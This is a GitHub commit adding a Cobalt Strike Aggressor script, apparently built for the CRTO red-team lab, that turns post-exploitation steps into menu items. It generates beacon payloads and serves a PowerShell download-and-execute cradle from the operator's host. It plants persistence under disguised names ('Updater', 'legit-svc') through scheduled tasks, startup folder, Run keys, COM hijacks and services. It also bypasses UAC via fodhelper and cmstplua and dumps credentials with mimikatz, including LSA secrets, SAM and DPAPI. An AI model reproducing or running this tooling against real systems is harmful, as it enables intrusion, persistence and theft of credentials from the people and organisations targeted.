STRLCPY/RTO_Aggressor_Script

Create CRTO.cna
rashbx1 committed with GitHub 1 month ago

6a5fa859

1 parent a80d952a

Total 1 files

■ ■ ■ ■ ■ ■

CRTO.cna

1	+	## Helper Functions
2	+	inline print_info {
3	+	println(formatDate("[HH:mm:ss] ") . "\cE[crto.cna]\o " . $1);
4	+	}
5	+
6	+	inline print_error {
7	+	println(formatDate("[HH:mm:ss] ") . "\c4[crto.cna]\o " . $1);
8	+	}
9	+
10	+
11	+	## Global Variables
12	+	global('$ip');
13	+
14	+	#$wait = 1;
15	+
16	+	$ip = localip();
17	+
18	+	popup beacon_bottom
19	+	{
20	+	menu "CRTO"
21	+	{
22	+	item "Initialize"
23	+	{
24	+	mkdir(script_resource("Payloads"));
25	+	mkdir(script_resource("Tools"));
26	+	}
27	+	item "Get Flag"
28	+	{
29	+	bshell($1, "type C:\\Users\\administrator\\Desktop\\flag*");
30	+	}
31	+	menu "Host Reconnaissance"
32	+	{
33	+	menu "Seatbelt"
34	+	{
35	+	item "Group : user"
36	+	{
37	+	binput($1, "Seatbelt.exe -group=user");
38	+	bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), " -group=user");
39	+	}
40	+
41	+	item "Group : system"
42	+	{
43	+	binput($1, "Seatbelt.exe -group=system");
44	+	bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), " -group=system");
45	+
46	+	}
47	+
48	+	item "Group : remote"
49	+	{
50	+	binput($1, "Seatbelt.exe -group=remote");
51	+	bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), " -group=remote");
52	+	}
53	+
54	+	item "Group : misc"
55	+	{
56	+	binput($1, "Seatbelt.exe -group=misc");
57	+	bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), " -group=misc");
58	+	}
59	+	}
60	+	}
61	+	menu "Host Persistence"
62	+	{
63	+	menu "Task Scheduler"
64	+	{
65	+	item "Powershell HTTP x64"
66	+	{
67	+	local('$dialog %defaults $script $PScommandBase64');
68	+
69	+	foreach $name (listeners_local()) {
70	+	$listener_name = lc($name);
71	+	if ($listener_name hasmatch "http") {
72	+	$script = artifact_payload($name, "powershell", "x64", "process", "None");
73	+	}
74	+	}
75	+	# host the script!
76	+	$url = site_host($ip, 80, "/tsp", $script, "text/plain", "Persistence - Task Scheduler - Powershell");
77	+	# Base64 powershell command + AMSI
78	+	$PScommandBase64 = transform("IEX ((new-object net.webclient).downloadstring(\"$url_amsi\"));IEX ((new-object net.webclient).downloadstring(\"$url\"))","powershell-base64");
79	+
80	+	$ToExec ="-t schtask -c \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -a \"-nop -w hidden -enc $PScommandBase64\" -n \"Updater\" -m add -o hourly";
81	+	binput($1, "execute-assembly SharPersist.exe $ToExec");
82	+	bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
83	+	}
84	+	item "Exe HTTP x64"
85	+	{
86	+	local('$dialog %defaults $data $PScommandBase64');
87	+
88	+	foreach $name (listeners_local()) {
89	+	$listener_name = lc($name);
90	+	if ($listener_name hasmatch "http") {
91	+	$data = artifact_payload($name, "exe", "x64", "process", "None");
92	+	}
93	+	}
94	+	$outfile = getFileProper(script_resource("Payloads"), "http_tsp.exe");
95	+	$handle = openf("> $outfile");
96	+	writeb($handle, $data);
97	+	closef($handle);
98	+
99	+	bcd($1, "c:\\windows\\Temp");
100	+	bupload($1, $outfile);
101	+
102	+	$ToExec ="-t schtask -c \"C:\\Windows\\Temp\\http_tsp.exe\" -n \"UpdaterBin\" -m add -o hourly";
103	+	binput($1, "execute-assembly SharPersist.exe $ToExec");
104	+	bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
105	+	}
106	+	}
107	+	menu "Startup Folder"
108	+	{
109	+	item "Powershell HTTP x64"
110	+	{
111	+	local('$dialog %defaults $script $PScommandBase64');
112	+
113	+	foreach $name (listeners_local()) {
114	+	$listener_name = lc($name);
115	+	if ($listener_name hasmatch "http") {
116	+	$script = artifact_payload($name, "powershell", "x64", "process", "None");
117	+	}
118	+	}
119	+	# host the script!
120	+	$url = site_host($ip, 80, "/sfp", $script, "text/plain", "Persistence - Task Scheduler - Powershell");
121	+	# Base64 powershell command + AMSI
122	+	$PScommandBase64 = transform("IEX ((new-object net.webclient).downloadstring(\"$url_amsi\"));IEX ((new-object net.webclient).downloadstring(\"$url\"))","powershell-base64");
123	+
124	+	$ToExec ="-t startupfolder -c \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -a \"-nop -w hidden -enc $PScommandBase64\" -m add -f \"UserEnvSetup\"";
125	+	binput($1, "execute-assembly SharPersist.exe $ToExec");
126	+	bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
127	+	}
128	+	item "Exe HTTP x64"
129	+	{
130	+	local('$dialog %defaults $data');
131	+
132	+	foreach $name (listeners_local()) {
133	+	$listener_name = lc($name);
134	+	if ($listener_name hasmatch "http") {
135	+	$data = artifact_payload($name, "exe", "x64", "process", "None");
136	+	}
137	+	}
138	+	$outfile = getFileProper(script_resource("Payloads"), "http_sfp.exe");
139	+	$handle = openf("> $outfile");
140	+	writeb($handle, $data);
141	+	closef($handle);
142	+
143	+	bcd($1, "c:\\windows\\Temp");
144	+	bupload($1, $outfile);
145	+
146	+	$ToExec ="-t startupfolder -c \"C:\\Windows\\Temp\\http_sfp.exe\" -m add -f \"UserEnvSetupBin\"";
147	+	binput($1, "execute-assembly SharPersist.exe $ToExec");
148	+	bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
149	+	}
150	+	}
151	+	menu "Registry AutoRun"
152	+	{
153	+	item "Exe HTTP x64"
154	+	{
155	+	local('$dialog %defaults $data');
156	+
157	+	foreach $name (listeners_local()) {
158	+	$listener_name = lc($name);
159	+	if ($listener_name hasmatch "http") {
160	+	$data = artifact_payload($name, "exe", "x64", "process", "None");
161	+	}
162	+	}
163	+	$outfile = getFileProper(script_resource("Payloads"), "http_arp.exe");
164	+	$handle = openf("> $outfile");
165	+	writeb($handle, $data);
166	+	closef($handle);
167	+
168	+	bcd($1, "c:\\windows\\Temp");
169	+	bupload($1, $outfile);
170	+
171	+	$ToExec ="-t reg -c \"C:\\Windows\\Temp\\http_arp.exe\" -k \"hkcurun\" -v UpdaterBin -m add";
172	+	binput($1, "execute-assembly SharPersist.exe $ToExec");
173	+	bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
174	+	}
175	+	}
176	+	menu "COM Hijacks"
177	+	{
178	+	item "Dll HTTP x64"
179	+	{
180	+	local('$dialog %defaults $data');
181	+
182	+	foreach $name (listeners_local()) {
183	+	$listener_name = lc($name);
184	+	if ($listener_name hasmatch "http") {
185	+	$data = artifact_payload($name, "dll", "x64", "thread", "None");
186	+	}
187	+	}
188	+	$outfile = getFileProper(script_resource("Payloads"), "http_com.dll");
189	+	$handle = openf("> $outfile");
190	+	writeb($handle, $data);
191	+	closef($handle);
192	+
193	+	bcd($1, "c:\\windows\\Temp");
194	+	bupload($1, $outfile);
195	+
196	+	$ToExec ="-t reg -c \"C:\\Windows\\Temp\\http_arp.exe\" -a \"/q /n\" -k \"hkcurun\" -v UpdaterBin -m add";
197	+	binput($1, "execute-assembly SharPersist.exe $ToExec");
198	+	bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
199	+	bpowerpick($1,"New-Item -Path \"HKCU:Software\\Classes\\CLSID\" -Name \"{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\"");
200	+	bpowerpick($1,"New-Item -Path \"HKCU:Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\" -Name \"InprocServer32\" -Value \"c:\\windows\\Temp\\http_com.dll\"");
201	+	bpowerpick($1,"New-ItemProperty -Path \"HKCU:Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32\" -Name \"ThreadingModel\" -Value \"Both\"");
202	+	}
203	+	}
204	+	menu "Services"
205	+	{
206	+	item "Svc TCP Bind Local x64"
207	+	{
208	+	local('$dialog %defaults $data');
209	+
210	+	foreach $name (listeners_local()) {
211	+	$listener_name = lc($name);
212	+	if ($listener_name hasmatch "tcp-local") {
213	+	$data = artifact_payload($name, "svcexe", "x64", "process", "None");
214	+	}
215	+	}
216	+	$outfile = getFileProper(script_resource("Payloads"), "tcp_svc.exe");
217	+	$handle = openf("> $outfile");
218	+	writeb($handle, $data);
219	+	closef($handle);
220	+
221	+	bcd($1, "c:\\windows\\Temp");
222	+	bupload($1, $outfile);
223	+
224	+	$ToExec ="-t service -c \"C:\\Windows\\Temp\\tcp_svc.exe\" -n \"legit-svc\" -m add";
225	+	binput($1, "execute-assembly SharPersist.exe $ToExec");
226	+	bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
227	+	}
228	+	item "Svc DNS"
229	+	{
230	+	local('$dialog %defaults $data');
231	+
232	+	foreach $name (listeners_local()) {
233	+	$listener_name = lc($name);
234	+	if ($listener_name hasmatch "dns") {
235	+	$data = artifact_payload($name, "svcexe", "x64", "process", "None");
236	+	}
237	+	}
238	+	$outfile = getFileProper(script_resource("Payloads"), "tcp_svc.exe");
239	+	$handle = openf("> $outfile");
240	+	writeb($handle, $data);
241	+	closef($handle);
242	+
243	+	bcd($1, "c:\\windows\\Temp");
244	+	bupload($1, $outfile);
245	+
246	+	$ToExec ="-t service -c \"C:\\Windows\\Temp\\tcp_svc.exe\" -n \"legit-svc\" -m add";
247	+	binput($1, "execute-assembly SharPersist.exe $ToExec");
248	+	bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
249	+	}
250	+	}
251	+	}
252	+	menu "Privilege Escalation"
253	+	{
254	+	item "Unquoted Service Paths"
255	+	{
256	+	binput($1, "SharpUp.exe audit UnquotedServicePath");
257	+	bexecute_assembly($1, script_resource('Tools/SharpUp.exe'), " audit UnquotedServicePath");
258	+	}
259	+	item "Weak Service Binary Permissions"
260	+	{
261	+	binput($1, "SharpUp.exe audit ModifiableServices");
262	+	bexecute_assembly($1, script_resource('Tools/SharpUp.exe'), " audit ModifiableServices");
263	+	}
264	+	menu "UAC Bypasses"
265	+	{
266	+	item "Elevate Kit Bind TCP Local x64"
267	+	{
268	+	binput($1, "elevate uac-schtasks tcp-local");
269	+
270	+	foreach $name (listeners_local()) {
271	+	$listener_name = lc($name);
272	+	if ($listener_name hasmatch "tcp-local") {
273	+	belevate($1, "uac-schtasks", $name);
274	+	}
275	+	}
276	+	bconnect($1, "127.0.0.1",4444);
277	+	}
278	+	item "Fodhelper Bind TCP Local x64"
279	+	{
280	+	binput($1, "Fodhelper Priv Esc");
281	+	local('$dialog %defaults $data');
282	+
283	+	foreach $name (listeners_local()) {
284	+	$listener_name = lc($name);
285	+	if ($listener_name hasmatch "tcp-local") {
286	+	$data = artifact_payload($name, "exe", "x64", "process", "None");
287	+	}
288	+	}
289	+	$outfile = getFileProper(script_resource("Payloads"), "tcp_fhuac.exe");
290	+	$handle = openf("> $outfile");
291	+	writeb($handle, $data);
292	+	closef($handle);
293	+
294	+	bcd($1, "c:\\windows\\Temp");
295	+	bupload($1, $outfile);
296	+
297	+	bpowerpick($1,"New-Item \"HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Force");
298	+	bpowerpick($1,"New-ItemProperty -Path \"HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force");
299	+	bpowerpick($1,"Set-ItemProperty -Path \"HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Name \"(default)\" -Value \"c:\\windows\\Temp\\tcp_fhuac.exe\" -Force");
300	+	brun($1,"cmd.exe /C \"C:\\Windows\\System32\\fodhelper.exe\"");
301	+	bconnect($1, "127.0.0.1",4444);
302	+	}
303	+	item "runasadmin uac-cmstplua HTTP x64 (from Powershell)"
304	+	{
305	+	local('$dialog %defaults $script $PScommandBase64');
306	+
307	+	foreach $name (listeners_local()) {
308	+	$listener_name = lc($name);
309	+	if ($listener_name hasmatch "http") {
310	+	$data = artifact_payload($name, "exe", "x64", "process", "None");
311	+	}
312	+	}
313	+	$outfile = getFileProper(script_resource("Payloads"), "uac.exe");
314	+	$handle = openf("> $outfile");
315	+	writeb($handle, $data);
316	+	closef($handle);
317	+
318	+	bcd($1, "c:\\windows\\Tasks");
319	+	bupload($1, $outfile);
320	+
321	+	binput($1, "runasadmin uac-cmstplua C:\\Windows\\Tasks\\uac.exe");
322	+	belevate_command($1, "uac-cmstplua", "C:\\Windows\\Tasks\\uac.exe");
323	+	}
324	+	}
325	+	}
326	+	menu "Credentials"
327	+	{
328	+	item "Lsa secret"
329	+	{
330	+	bmimikatz($1, "token::elevate; lsadump::secrets");
331	+	}
332	+
333	+	item "logonpassword"
334	+	{
335	+	bmimikatz($1, "token::elevate; sekurlsa::logonpasswords");
336	+	}
337	+
338	+	item "SAM dump"
339	+	{
340	+	bmimikatz($1, "token::elevate; lsadump::sam");
341	+	}
342	+
343	+	item "Kerberos Encryption Keys"
344	+	{
345	+	bmimikatz($1, "token::elevate; sekurlsa::ekeys");
346	+	}
347	+
348	+	item "Domain Cached Credentials"
349	+	{
350	+	bmimikatz($1, "token::elevate; lsadump::cache");
351	+	}
352	+
353	+	item "Kerberos Tickets list"
354	+	{
355	+	bexecute_assembly($1, script_resource('Tools/Rubeus.exe'), "triage");
356	+	}
357	+
358	+	item "Wifi password"
359	+	{
360	+	bexecute_assembly($1, script_resource('Tools/SharpWifiDump.exe'), " ");
361	+	}
362	+
363	+	item "Password in registry (Machine)"
364	+	{
365	+	bpowerpick($1, "reg query HKLM /f password /t REG_SZ /s");
366	+	}
367	+
368	+	item "Password in registry (User)"
369	+	{
370	+	bpowerpick($1, "reg query HKLM /f password /t REG_SZ /s");
371	+	}
372	+
373	+	item "SharpWeb"
374	+	{
375	+	bexecute_assembly($1, script_resource('Tools/SharpWeb.exe'), " all");
376	+	}
377	+	}
378	+	menu "Domain Reconnaissance"
379	+	{
380	+	item "Domain information"
381	+	{
382	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
383	+	bpowerpick($1, ' Get-Domain');
384	+	bpowershell_import_clear($1);
385	+	}
386	+
387	+	item "Domain Controller"
388	+	{
389	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
390	+	bpowerpick($1, ' Get-DomainController');
391	+	bpowershell_import_clear($1);
392	+	}
393	+
394	+	item "Trust information"
395	+	{
396	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
397	+	bpowerpick($1, ' Get-DomainTrust');
398	+	bpowershell_import_clear($1);
399	+
400	+	}
401	+
402	+	item "User list"
403	+	{
404	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
405	+	bpowerpick($1, ' Get-DomainUser -Properties DisplayName, MemberOf \| fl');
406	+	bpowershell_import_clear($1);
407	+	}
408	+
409	+	item "Computer list"
410	+	{
411	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
412	+	bpowerpick($1, ' Get-DomainComputer -Properties DnsHostName \| sort -Property DnsHostName');
413	+	bpowershell_import_clear($1);
414	+	}
415	+
416	+
417	+	item "Group list"
418	+	{
419	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
420	+	bpowerpick($1, ' Get-DomainGroup \| where Name -like "Admins" \| select SamAccountName');
421	+	bpowershell_import_clear($1);
422	+	}
423	+
424	+	item "GPO list"
425	+	{
426	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
427	+	bpowerpick($1, ' Get-DomainGPO -Properties DisplayName \| sort -Property DisplayName');
428	+	bpowershell_import_clear($1);
429	+	}
430	+
431	+	item "GPO Local Group"
432	+	{
433	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
434	+	bpowerpick($1, ' Get-DomainGPOLocalGroup \| select GPODisplayName, GroupName');
435	+	bpowershell_import_clear($1);
436	+	}
437	+
438	+	item "GPO with modification rights"
439	+	{
440	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
441	+	bpowerpick($1, ' $sid=Get-DomainSID ; Get-DomainGPO \| Get-DomainObjectAcl -ResolveGUIDs \| ? { $_.ActiveDirectoryRights -match "CreateChild\|WriteProperty" -and $_.SecurityIdentifier -match $sid+"-[\d]{4,10}" }');
442	+	bpowershell_import_clear($1);
443	+	}
444	+
445	+	item "OU list"
446	+	{
447	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
448	+	bpowerpick($1, ' Get-DomainOU -Properties Name \| sort -Property Name');
449	+	bpowershell_import_clear($1);
450	+	}
451	+
452	+
453	+	item "MSSQL Local Instance"
454	+	{
455	+	bpowershell_import($1, script_resource("Tools/PowerUpSQL.ps1"));
456	+	bpowerpick($1, ' Get-SQLInstanceLocal -Verbose');
457	+	bpowershell_import_clear($1);
458	+
459	+	}
460	+
461	+
462	+	item "MSSQL Domain Instance"
463	+	{
464	+	bpowershell_import($1, script_resource("Tools/PowerUpSQL.ps1"));
465	+	bpowerpick($1, ' Get-SQLInstanceDomain -Verbose');
466	+	bpowershell_import_clear($1);
467	+
468	+	}
469	+
470	+	item "Kerberoastable user"
471	+	{
472	+	bexecute_assembly($1, script_resource('Tools/Rubeus.exe'), "kerberoast /nowrap");
473	+	}
474	+
475	+	item "Asreprostable user"
476	+	{
477	+	bexecute_assembly($1, script_resource('Tools/Rubeus.exe'), "asreproast /nowrap");
478	+	}
479	+
480	+	item "Logged on"
481	+	{
482	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
483	+	bpowerpick($1, ' Get-DomainComputer \| Get-NetLoggedon');
484	+	bpowershell_import_clear($1);
485	+	}
486	+
487	+	item "Net session"
488	+	{
489	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
490	+	bpowerpick($1, ' Get-DomainComputer \| Get-NetSession');
491	+	bpowershell_import_clear($1);
492	+	}
493	+
494	+	item "RDP Session"
495	+	{
496	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
497	+	bpowerpick($1, ' Get-DomainComputer \| Get-NetRDPSession');
498	+	bpowershell_import_clear($1);
499	+	}
500	+
501	+	item "DFS Share"
502	+	{
503	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
504	+	bpowerpick($1, ' Get-DomainDFSShare');
505	+	bpowershell_import_clear($1);
506	+
507	+	}
508	+
509	+	item "Net share"
510	+	{
511	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
512	+	bpowerpick($1, ' Get-DomainComputer \| Get-NetShare');
513	+	bpowershell_import_clear($1);
514	+	}
515	+
516	+	item "Share finder"
517	+	{
518	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
519	+	bpowerpick($1, 'Find-DomainShare -CheckShareAccess');
520	+	bpowershell_import_clear($1);
521	+	}
522	+
523	+	item "Search .doc, .xls, .csv, .ppt* in shares"
524	+	{
525	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
526	+	bpowerpick($1, 'Find-InterestingDomainShareFile -Include .doc, .xls, .csv, .ppt*');
527	+	bpowershell_import_clear($1);
528	+	}
529	+
530	+	item "Search Unconstrained deleguation"
531	+	{
532	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
533	+	bpowerpick($1, ' Get-DomainComputer -UnConstrained \| select samaccountname, dnshostname');
534	+	bpowershell_import_clear($1);
535	+	}
536	+
537	+	item "Search deleguation (user)"
538	+	{
539	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
540	+	bpowerpick($1, ' Get-DomainUser -TrustedToAuth \| select userprincipalname, name, msds-allowedtodelegateto');
541	+	bpowershell_import_clear($1);
542	+	}
543	+
544	+	item "Search deleguation (computer)"
545	+	{
546	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
547	+	bpowerpick($1, ' Get-DomainComputer -TrustedToAuth \| select userprincipalname, name, msds-allowedtodelegateto');
548	+	bpowershell_import_clear($1);
549	+	}
550	+
551	+	item "DNS Record"
552	+	{
553	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
554	+	bpowerpick($1, ' Get-DomainDNSZone \| Get-DomainDNSRecord \| select name');
555	+	bpowershell_import_clear($1);
556	+	}
557	+
558	+	item "Run SharpHound"
559	+	{
560	+	bexecute_assembly($1, script_resource('Tools/SharpHound.exe'), "-c All,GPOLocalGroup");
561	+	}
562	+	}
563	+	menu "DPAPI"
564	+	{
565	+	item "Credential Manager"
566	+	{
567	+	binput($1, "Seatbelt.exe WindowsCredentialFiles");
568	+	bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), "WindowsCredentialFiles");
569	+	}
570	+	item "Get Master Key cached (admin)"
571	+	{
572	+	binput($1, "mimikatz !sekurlsa::dpapi");
573	+	bmimikatz($1, "!sekurlsa::dpapi");
574	+	}
575	+	item "List Master keys files"
576	+	{
577	+	bpowerpick($1, "gci -hidden \$env:appdata/Microsoft/Protect/S-/----,\$env:localappdata/Microsoft/Protect/S-/----", '', '', &result_ps);
578	+	}
579	+	item "List Credentials files"
580	+	{
581	+	bpowerpick($1, "gci -hidden \$env:appdata/Microsoft/Credentials,\$env:localappdata/Microsoft/Credentials", '', '', &result_ps);
582	+	}
583	+	item "Decrypt current user Credentials"
584	+	{
585	+	bpowerpick($1, "gci -hidden \$env:appdata/Microsoft/Credentials,\$env:localappdata/Microsoft/Credentials \\| foreach \{\$_.FullName\}", '', '', &result_get_creds);
586	+	}
587	+	item "Decrypt Scheduled Task Credentials (admin)"
588	+	{
589	+	bpowerpick($1, "gci -hidden C:/Windows/System32/config/systemprofile/AppData/Local/Microsoft/Credentials \\| foreach \{\$_.FullName\}", '', '', &result_get_task_creds);
590	+	}
591	+	}
592	+	menu "ADCS"
593	+	{
594	+	item "Finding Certificate Authorities"
595	+	{
596	+	binput($1, "Certify.exe cas");
597	+	bexecute_assembly($1, script_resource('Tools/Certify.exe'), "cas");
598	+	}
599	+	item "Misconfigured Certificate Templates"
600	+	{
601	+	binput($1, "Certify.exe find /vulnerable");
602	+	bexecute_assembly($1, script_resource('Tools/Certify.exe'), "find /vulnerable");
603	+	}
604	+	}
605	+	menu "Microsoft Configuration Manager"
606	+	{
607	+	item "Finding SCCM Servers (SharpSCCM)"
608	+	{
609	+	binput($1, "SharpSCCM.exe local site-info --no-banner");
610	+	bexecute_assembly($1, script_resource('Tools/SharpSCCM.exe'), "local site-info --no-banner");
611	+	}
612	+	item "Finding SCCM Servers (WMI)"
613	+	{
614	+	binput($1, "Get-WmiObject -Class SMS_Authority -Namespace root\\CCM \| select Name, CurrentManagementPoint \| fl");
615	+	bpowerpick($1, "Get-WmiObject -Class SMS_Authority -Namespace root\\CCM \| select Name, CurrentManagementPoint \| fl");
616	+	}
617	+	item "NAC Credentials (admin)"
618	+	{
619	+	binput($1, "SharpSCCM.exe local naa -m wmi --no-banner");
620	+	bexecute_assembly($1, script_resource('Tools/SharpSCCM.exe'), "local naa -m wmi --no-banner");
621	+	}
622	+	item "Get SCCM Collections for current user"
623	+	{
624	+	binput($1, "SharpSCCM.exe get collections --no-banner");
625	+	bexecute_assembly($1, script_resource('Tools/SharpSCCM.exe'), "get collections --no-banner");
626	+	}
627	+	item "Get SCCM User rights"
628	+	{
629	+	binput($1, "SharpSCCM.exe get class-instances SMS_Admin --no-banner");
630	+	bexecute_assembly($1, script_resource('Tools/SharpSCCM.exe'), "get class-instances SMS_Admin --no-banner");
631	+	}
632	+	}
633	+	menu "LAPS"
634	+	{
635	+	item "Check if AdmPwd.dll exists in local computer"
636	+	{
637	+	binput($1, "ls C:\\Program Files\\LAPS\\CSE");
638	+	bls($1, "C:\\Program Files\\LAPS\\CSE");
639	+	}
640	+	item "Search GPO with LAPS in name"
641	+	{
642	+	binput($1, "Get-DomainGPO \| ? { \$_.DisplayName -like \"laps\" } \| select DisplayName, Name, GPCFileSysPath \| fl");
643	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
644	+	bpowerpick($1, "Get-DomainGPO \| ? { \$_.DisplayName -like \"laps\" } \| select DisplayName, Name, GPCFileSysPath \| fl");
645	+	bpowershell_import_clear($1);
646	+	}
647	+	item "List computer with ms-Mcs-AdmPwdExpirationTime not null"
648	+	{
649	+	binput($1, "Get-DomainComputer \| ? { \$_.\"ms-Mcs-AdmPwdExpirationTime\" -ne \$null } \| select dnsHostName");
650	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
651	+	bpowerpick($1, "Get-DomainComputer \| ? { \$_.\"ms-Mcs-AdmPwdExpirationTime\" -ne \$null } \| select dnsHostName");
652	+	bpowershell_import_clear($1);
653	+	}
654	+	item "List who is allowed to read LAPS password (PowerView)"
655	+	{
656	+	binput($1, "Get-DomainComputer \| Get-DomainObjectAcl -ResolveGUIDs \| ? { \$_.ObjectAceType -eq \"ms-Mcs-AdmPwd\" -and \$_.ActiveDirectoryRights -match \"ReadProperty\" } \| select ObjectDn, SecurityIdentifier \| fl");
657	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
658	+	bpowerpick($1, "Get-DomainComputer \| Get-DomainObjectAcl -ResolveGUIDs \| ? { \$_.ObjectAceType -eq \"ms-Mcs-AdmPwd\" -and \$_.ActiveDirectoryRights -match \"ReadProperty\" } \| select ObjectDn, SecurityIdentifier \| fl");
659	+	bpowershell_import_clear($1);
660	+	}
661	+	item "List who is allowed to read LAPS password (LAPSToolkit)"
662	+	{
663	+	binput($1, "Find-LAPSDelegatedGroups");
664	+	bpowershell_import($1, script_resource("Tools/LAPSToolkit.ps1"));
665	+	bpowerpick($1, 'Find-LAPSDelegatedGroups');
666	+	bpowershell_import_clear($1);
667	+	}
668	+	}
669	+	menu "AppLocker"
670	+	{
671	+	item "Search GPO with AppLocker in name"
672	+	{
673	+	binput($1, "Get-DomainGPO -Domain dev-studio.com \| ? { \$_.DisplayName -like \"AppLocker\" } \| select displayname, gpcfilesyspath");
674	+	bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
675	+	bpowerpick($1, "Get-DomainGPO -Domain dev-studio.com \| ? { \$_.DisplayName -like \"AppLocker\" } \| select displayname, gpcfilesyspath");
676	+	bpowershell_import_clear($1);
677	+	}
678	+	}
679	+	}
680	+	}
681	+
682	+	## Generate Payload
683	+	sub generate_my_payload {
684	+	$outfile = getFileProper(script_resource("Payloads"), $2);
685	+	$handle = openf("> $outfile");
686	+	writeb($handle, $1);
687	+	closef($handle);
688	+	}
689	+
690	+	## DPAPI functions
691	+	## SYSTEM
692	+	sub result_get_task_creds {
693	+	local('$cmd $cred $out')
694	+	binput($1, 'Powerpick executed');
695	+	foreach $cred (split('\r\n', $2))
696	+	{
697	+	$cmd = "!sekurlsa::dpapi;dpapi::cred /in:" . $cred;
698	+	bmimikatz($1, $cmd, $null, $null,&write_in_file_task_dpapi);
699	+	}
700	+	}
701	+
702	+	sub write_in_file_task_dpapi {
703	+	binput($1, "Full Credentials wrote in c:/windows/temp/dpapi_task.txt");
704	+	$out = openf(">>" . "c:/windows/temp/dpapi_task.txt");
705	+	writeb($out, $2);
706	+	closef($out);
707	+	}
708	+
709	+	## User
710	+	sub result_get_creds {
711	+	local('$cmd $cred $out')
712	+	binput($1, 'Powerpick executed');
713	+	foreach $cred (split('\r\n', $2))
714	+	{
715	+	$cmd = "dpapi::cred /in:" . $cred;
716	+	bmimikatz($1, $cmd, $null, $null, lambda({ result_get_masterkey ($1, $2, $3, $cred); }, \$cred));
717	+	}
718	+	}
719	+
720	+	sub result_get_masterkey {
721	+	local('$mk $cred');
722	+	binput($1, "Mimikatz Executed");
723	+	$cred = $4;
724	+	$mk = matches($2, 'guidMasterKey[^\{]+\{([^\}]+)\}')[0];
725	+	bpowerpick($1, "gci -hidden -ErrorAction \"silentlycontinue\" \$env:appdata/Microsoft/Protect/S-/----,\$env:localappdata/Microsoft/Protect/S-/---- \\| foreach \{\$_.FullName\} \\| findstr " . $mk, '', '', lambda({ result_get_mk ($1, $2, $3, $cred); }, \$cred));
726	+	}
727	+
728	+	sub result_get_mk {
729	+	local('$mk $cred');
730	+	$mk = split('\r\n', $2)[0];
731	+	$cred = $4;
732	+	bmimikatz($1, "dpapi::masterkey /in:" . $mk . " /rpc;dpapi::cred /in:" . $cred, $null, $null, &write_in_file_dpapi);
733	+	}
734	+
735	+	sub write_in_file_dpapi {
736	+	binput($1, "Full Credentials wrote in c:/windows/temp/dpapi.txt");
737	+	$out = openf(">>" . "c:/windows/temp/dpapi.txt");
738	+	writeb($out, $2);
739	+	closef($out);
740	+	}
741	+
742	+	# Handle DNS beacon
743	+	on beacon_initial_empty {
744	+	binput($1, "[Acting on new DNS Beacon]");
745	+
746	+	# change the data channel to DNS TXT
747	+	bmode($1, "dns-txt");
748	+
749	+	# request the Beacon checkin and send its metadata
750	+	bcheckin($1);
751	+	}
752	+
753	+	print_info("CRTO CNA loaded");
754	+

Create CRTO.cna